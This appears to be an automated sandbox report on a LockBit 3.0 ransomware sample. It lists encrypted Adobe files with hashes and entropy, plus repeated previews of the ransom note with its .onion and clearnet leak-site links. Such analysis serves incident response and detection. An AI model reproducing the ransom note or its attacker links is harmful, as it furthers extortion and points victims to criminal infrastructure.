                Preview:.D~e..T..#...8.^D....#.....]j..+!..#i....y=.-....\...6R.J%.....V.I.BS..g..6.....o4...$.3.+...|a?U.M.p.....u.5......j6R%v....Q7;/...LN.I)q.3.......YIq.z.^.N...#8..7..m.I.}. t..Y...../m..,`......FM......X.X....l.~...G'..^:.r...,.#..w.`...@....owF..SE.q.<..3....@.h.>....x.%1<...h|f..v..M....*.....8>b.;...>.>.(.42..u.n2B....>.._|r..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):1227
                Entropy (8bit):7.851783455913727
                Encrypted:false
                SSDEEP:24:9wj4IZXnjC/Ocy6CU5xWtgNaCoVt/drGV1TybB6SOgihoa/3TD2HNAX+i+9BVR:9wj4IFg26CUygJongQ6SjiNDaGHezR
                MD5:FECA8C948F428717A47701A5EF314A4E
                SHA1:9B5DA754AAC45132842FDD5382BDFAE6593FE5CC
                SHA-256:E0170488428F860711D31E1877FFF93DAFF758FB5EB60A63F7A64F557DC5493A
                SHA-512:F73EFA90DBF3E6B1CC0F933430D9709D30127437E507FC5CE264107CD8FBFE5A384760FFBFEEEE857C31B8BFB063C4D862CC7980F831B8F3D6BA130E19AFAE56
                Malicious:false
                Preview:o..88H.D6<.#........=..c2.......'.u..=....vt..B..E;m.0...E.:.....c'.t..KXS.-UTJ.......m....%a.%.^"...=K>..U&......S..k8.F...@.z..3.#.d.......j......5#....F.3;j......}..UG../.0......yu....L.D...6.....O4.=...m ?O..X]..../..7.[....4m...T.Iau...`=\-;%.qb....[Z.`.w.*..*.j..4.+....2..u._...Q..[..!#.!E`.}"/....A........K..>.>.......Y..(...7.+...+..Cq...-.]]...Y#....#.1.....N...q.}....#lZ...s....=7.....';..{...........Z..o\.,...0Nz..'!....'..}..T..~!......|.......D...g`.h. .j...\.wd....{q...1..(....fYT.w..#).......m..%.>..9&.....n..........x..{.L....E?.EHA...oA.9...s...|.K..L..._..dE.Nq...}U.b.&.gi. ...X.S*[.IQ].b.....yH..&[`...xMk.r.1.2.D...r.%...{.c......(`.....7-./B.YB...K./.D...%.RKo.r.'.UG......g..6......[.9Ik.#.Hm_...7...?..^...<.y....'...r/....A.G+1......+.......R....hI....NT..m.K.}*.6O.qA^o. k....7..T.K..H,..By.!...s.$.e.....cb..>...f..T...L........i..wp.Hq..{o9.SR.........4y.E..?:.W.]9.1...5.P....A.....q~.c..!..^7.u-,.P. ...)

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):253
                Entropy (8bit):7.105813055063544
                Encrypted:false
                SSDEEP:6:zgTjQQXuBqCGlSvcT7A45CAdtmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:zgTnTocQ0CAHD2VJNAWnM+i+9BVzd
                MD5:3C676B795155F3964487D37772FF2A25
                SHA1:52E106E49CA0CCB49011BB73A09F504F5CC4C814
                SHA-256:E56412744C5B0C03373B54BE6968E7E4296DFEDAD0CD6CD698C2DD6276F1BF90
                SHA-512:853EEEDC3A338214B1483F2361709DB47EAB1C3E4D5C3C5291550CB9EDF6C4E2B547AB9D6312D529E597810842D1D054FC56D718161E69797CFC1253278233E0
                Malicious:false
                Preview:..i4I3...E........Fhy[..^1.t-d.Z7....@..r...z..j..GB.A.3d$.Ek...}..7.B...!.@..;}U.Ug.y...6h.9s..3C.+.&......\.E]._..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):61678
                Entropy (8bit):7.996890966777763
                Encrypted:true
                SSDEEP:1536:2TPc1rF8Te+O4a0tdhlZxUjnswRyIDlQV6cphZEg:z1rF8TeF4vVlZxUbsw3DlQVpNl
                MD5:8572A1BF9F5AA41DF995697CE840B49C
                SHA1:8D0FFBF83F66056D82C61AEC424E1528EF5A25AB
                SHA-256:0E0480F8B7F482E1134AFD09511BA7698018377CF694E34176410230052EBFB4
                SHA-512:1DAE76BED9295FC2A93CE85F68E9096D8F2DBAC8006477095C219D3A7EA42EAF27642F10C835B6BDD6CEF9D1A7AF99A885D2CBD36B1DD0037D69326E3D2B95FB
                Malicious:true
                Preview:0/>...+....N`g;Y.YMO.^../..%g..........``...pBIF..b.t.........`u........Ij.^....d..v.>.K..T.Z....v...Mn.w....?...".........r-i......_."..It...L...AK..H......7.^g.....1.h.0.X.;6.|.I<...o^...!.[..vq.i5.c.....b...W...0....|=A..'.......g.,.:..s..v. ........O...u.B!..3...:..b.....2K.jw.q..g.3...J..I...D.l...$....Vo8.@$w..<..}..._.|.!/{....M......\...Kv...._...{...+q.....C....6.kr.)m.....C.x.....U.*..`..hz....|x>U..........JO.^..@...KD^.$..t6.v.B...zdc L(.".. ... [.T(..r...;..[.^.=...v....z|.V. !...._.MB".I..|..3.B..d.4?G.mXA.h^....Uw..wK.)L.5...............Z.U>l..(..m.e....F..U..pL.hi...,.1...B..,....|..J.{<(.....d.Z. .....9:....=.}.sp.nq..{..!.Xy(.x..$.....)..L.VD...71..../..YO.~....)"..$!A..........ZAh...~.......,.1...Bb.I!....V|./b.J....l3. ..Y..._..[...gV.C........X.-A.?9....I.G6.?...N.*..^S....O..}.......o4cG..PR..>E.)!P......w :.+g....5..5@.J.ic........q.O.Ew..Vu...W.3c^.L.P...E..'(........2...&JvT.%.e.g`%.j.]..B.!.4M../y.a..

                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\notificationsDB.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):24819
                Entropy (8bit):7.992573775244684
                Encrypted:true
                SSDEEP:384:dGR/h7+2xQXbtDSNPOq1IvDAPSK8d8V/CMV78M1cPx1rR8pciYdP6cNEGQnCDOEl:glh62apQWcGdYKOL6PpfzQgOJSSU
                MD5:EA75992D20D424FBA5DCA9367B46E933
                SHA1:3AEFBD93CEE0AEA0086A5FD66949144909FB2A55
                SHA-256:C33ABDA5458E276CD8F9F4483A9AAF896BC5EED08098B930474CE52CA2068F70
                SHA-512:42F2F3F7416D9EFD314E81B0B0875DCAB3D9AF2A07EFAAACC6F00A70CDB5D242E150D1B0322F19A1133D0FBFF170AFCF6411CEFEA4A772015A04362F687B5D25
                Malicious:true
                Preview:.U*.alP.R3GE'.....5...o....Ml.SY.._....w.I..#. T..$./;...!.W.......'..as..Ce=...o.|Jty!.~...~$gD1.Y...{J.W....B."*.I...k.........q..u...S.;;j;..k..v&r../..Jm.1..-INSc......8o;.;eW..e.KR..*qKr.SB."3..U...$.Dm.{U....C.;.=....l_(..#..W..%n:?........s'..j..hxxa....aT....j....$@../P(......X.X...K.}...B.$..+.....7.3.r...U.Y.YU..-..{.i.{.9..>....8YV.h..&.....U#..U.V.....[O.,.p...N....qH..l._..X......W.+..o.;].>K ..s.pfDQ.')......`.6.....w....,.iz....?..U....e]...-...Xem.........v[......ZNg...T.$d.../....\......gR>./...7P..D......n.dW...9@.~{...m:{4.79...e."..au.c....G<......[..........|..p.EO...z.()....i.L...M..4........`.0f..b.r...W..P.....3...!..n......]_.!....;.3.Qa..x/).._.-#.;.#.....)EI;.T.s'.g/....+.."r....Lh.3_......{mc.. ..=$..u..Rf.,X.b.M..Z..k<O .(o..n.lj.@...P.3.9.....dC.2@.@...3.C.^......(..-.....;5....s)......)w.pG+.......C.._..(.*..m.....K.Y..nV.N.X..XX.T.,,f...].].f...$...~.F..i.1.l7N>.+?..fJ{;I.q.q..j./.....:-..Y ..D...pN.

                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\assets\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):1289
                Entropy (8bit):7.840466151942445
                Encrypted:false
                SSDEEP:24:R+4z+RL6emkvjVHrVcpKZPnrySV8NZhMrqGFzXqrEgAAp4WHLjSr4XWD2HNAX+ia:l0LJmIZLNPry73KOA7yAzWHLHWDaGHe9
                MD5:A6C2AD328EB640047A50D08631AE8419
                SHA1:0DAB02EE982397A612C87AADD3065F0FB846858C
                SHA-256:93D60D27139D75AC708C3D9C22AB4720D31983E58FC3E593694BF2900C6DAEA2
                SHA-512:BEF01F98B02445DB32AB9674225B531F8BB3B3D0FF5C9FF4C24992D702848BFC822713C535AE626C5FE7708B2E7B611DFFEC5B8213F203EB9CD53E6FB0BAEE5D
                Malicious:false
                Preview:.I:>b....DL...O..<.J...aO_......}.+V.[u..;.c.1.@..U..I..4...._...+..s3..Y.KgmP..4....8H..(.....}A..M.59:./...P.....$..'>sYx.:k...2.R..)...6r+......@....TT.X.0AV9..uO..Xo.....<.#.|(......0...:.v..zr..9*XJ...pyl..Q.N...<..\.`..E4...5L.{..`........jry 8......T.p%uv..7.]/,p@..$. .LvO.It..).l.Q?.U.i-8....N..F..}.}~.9....].-...<..%..<$.~#S......\]tEt..v......U:B.e.U....Q.>.5Yh.......{......*.,...H.\g...h=!..X.s8......Qc..B...k..P..|q((.f...d.R.3......@_.....?..j.......dg...-p....I.T......./j.e6.....'.@.o....Ir..~.RT."0.}LK.;.3..Orq..4..;."..?5v.r.i"..?....4...d...Eh5$...-.J;...d../1....j.._Fls..r...K.wk.!pIf.w.o......syH....cu1..x^.~\.(;..:``........O..:....h/+....x7W........n.YT.o.E...X..]..oz&.(..h0.......|..*..pg..c...0..{9m.<.]..!.=-.-W.B..v.d......YF..A...%q...ud;.O.F.p.*..P..0r..i4.V....E.....@.Q.~.u...A.;?....Fw..K....u.U....z,.x.t.y.z[.v...*../..k.Vr.c.q[.X..E>4y| v....o.d..L.6?.C.....h..E.y %.....zy.u2..'S.....".M.(...F.#Ij#....F

                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):157694
                Entropy (8bit):7.9991392740850475
                Encrypted:true
                SSDEEP:3072:jsU8dqz5WRt8p6Cm6Gv78HA7QeVviKWXqYPnxk/d2WkL+Oe9G4Q:gUKawRt80Cm6GFD0nJ0Oe9Gj
                MD5:C7FA8ED6E7478946CF2176D04EA853FB
                SHA1:E66F7B8AB60660F1A67A32C08EAA69D2B8488301
                SHA-256:A67C7A79F917B33EC451E0234E308B3D5D2EB2CE651CBFD792EE49A17FC37628
                SHA-512:A0448A07C996327D14DA46AE27A66FF92ED8EBCDBC7E61C39601AF95C9BCF778FE5BB408DE6BA033A53772B92DC00EDE8158C0A3BDB6B261872C2F2677B58E03
                Malicious:true
                Preview:"n.22.%, _.L.....>.1......k.{K\H....<..Gd1.\0.V.;..'..n.M.....u.R...'.c[.Z.7...#.g.}o..:Vt.j.Ox=.../..m.~..<?...Z9^.g. ..O....J...........d.Ud.`..[...).%.f9.....+._..!nj.......R@..}.....WhNb.S.0.d^..,.........QBBr.W!...{....].}.D..........Zp..Nm."c!.*:1...]Z.:..90.....V8X.}&.V.~.^.-Y...5O....._^3...#.{3.|.&B.n.kB.n..h....]..".xxp..%..5.u...zP.B..jR.j+..I...........Z.w.O.:....|=.x.c)-R.*Q,BL...r..`..A.7.Hb...*.gf...t.f...u......M.b.2..u.....`.1.7&g.[......r..j.6..me..Z.Q...@P...X..7...cF........).}.F....26...V...!}..&.{y.h.ZT...8...A.P.:..7..Nf@Ge9.HY..o...."..nb.g........J....SG.}96_.`..B../...|.yY=f....FK.C`=~...v..X...s...u..R...#..5d.....gq..dCe..+.qI......8.<.j.......m......k!...X....E..]...I.....Jz.......ox>.O*..........eU..<i....3.s...v.. .=]8EPS.&Ed...?..:.F(]......{.....N$cZ...|......x6.p.V...'e.3.h...J........l.Z....X..=...........S1.).w..].C.......z..a.l.......%v.r>.'']X..m.1.R.%..2.%..L=W.mx...O.F..},........U..[...b.DV..\..G'..I..

                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):9810
                Entropy (8bit):7.980674818351196
                Encrypted:false
                SSDEEP:192:u+PxwPn6O6pcMg56xvGDrhJR4xyL0BQHlzSLNGNplddhiEqjQG0Go:rPxk6prg5EGnhz4pLINjDlf
                MD5:A0D66F1D53F8EDF28342246523D01E73
                SHA1:793117B7BE201B977AC066A99A7CB6FF8B854A62
                SHA-256:50935FD0704F616BD780DF09E0BE489CF1FEDA162BFFB38B60955FA8449A41C1
                SHA-512:7FF6734705C4EE545ACF655207041A61584A8A06BDFEECF0881D1C916B2326DFE4171CC79877343A1BC29F707023982FC24CD1778F62665F5D12C18C132F0333
                Malicious:false
                Preview:.H$.ik... .....3.x6.XNho.HW.p.m.X.Y.d.d{| ).h..u........MZS.n].x.b.G.&......<....5.\Z.V..B@-.........1.0y'..N..%....QS}.GU...!}.3Tg.)g.F..!.t.l.)Z{..1].R.".]Z..i.L...W....2..=.r .....F>...F~...!M...N...m..z:..M`...d<......>B....E..~x.....Jc..1..E.....=!.e..-...sN5G......B.\.K...y]...?.......o:.......w.><.xD...V.)%.EF.?.&}....n~.....-h.].}..P.....)...?.T.....E..VJ.....Vt.u;..........G.....c..y%..... r.'..X..r..v.8_Xq....Az.t..Zg...?C..Q!.l...{........}.....A.PV18..q|u=.;..a.jx..+.e$...|g.>ml..5mK.H?X#.....O.......F........J..G.......V..9.E.....!=.ys......W.a..Q...R*:.....;.=....W.Lm...c..x..=.!...w..P.w...[.r........H.(..........,..o....w.ZMQ^.f.....7.r..>....d.,......Eb...I...)f.\.c.....H...g..J...7...h.8.&2.Bk.F...3.....8L.xq.....M......5.G<..'../t..UCNF#5.c"7.c.@.......LF.&._...Zr...=...Ja..&'....G.ZDF.f.F..xZ}....~.O......6N.9...'b..cE.L.....Vf..........z...0..ndf....L.\.?.Y ......j"A.C..b.Z.U^U.2Zpl......E.<.=t."..t..(........P

                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):245442
                Entropy (8bit):7.999328835209392
                Encrypted:true
